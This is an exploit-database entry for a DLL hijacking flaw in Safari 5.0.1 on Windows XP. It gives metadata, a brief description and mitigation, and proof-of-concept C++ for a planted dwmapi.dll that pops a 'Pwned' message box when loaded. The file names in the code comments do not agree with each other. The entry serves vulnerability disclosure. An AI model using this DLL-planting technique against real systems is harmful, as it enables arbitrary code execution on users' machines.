Safari 5.0.1 Exploit

vendor:

Safari

by:

Vinay Katoch

7,5

CVSS

HIGH

DLL Hijacking

427

CWE

Product Name: Safari

Affected Version From: Safari 5.0.1

Affected Version To: Safari 5.0.1

Patch Exists: No

Related CWE: N/A

CPE: a:apple:safari:5.0.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3

2011

A DLL hijacking vulnerability exists in Safari 5.0.1 which allows an attacker to execute arbitrary code on the target system. The vulnerability is triggered when a specially crafted .htm, .mht, .mhtml, .xht, .xhtm, or .xhtl file is opened in Safari. The file must be placed in the same folder as the dwmapi.dll file. The code for dwmapi.dll contains a MessageBox function which will execute arbitrary code when the file is opened in Safari.

Mitigation:

Disable the loading of DLLs from remote shares and restrict write access to the DLLs.

Source

Exploit-DB raw data:

/*
Version: Safari 5.0.1
Tested on: Windows XP SP3
Author : Secfence

Exploit By:
Vinay Katoch,
Secfence Technologies
www.secfence.com
http://twitter.com/secfence

Place a .htm .mht .mhtml .xht .xhtm .xhtl file and dwmapi.dll in same folder
and run file in safari.

Code for dwmapi.dll:
*/

/*----------*/

/* wintab32.cpp */

#include "stdafx.h"
#include "dragon.h"

void init() {
MessageBox(NULL,"Pwned", "Pwned!",0x00000003);
}


BOOL APIENTRY DllMain( HANDLE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
)
{
    switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
init();break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
    }
    return TRUE;
}

/*----------*/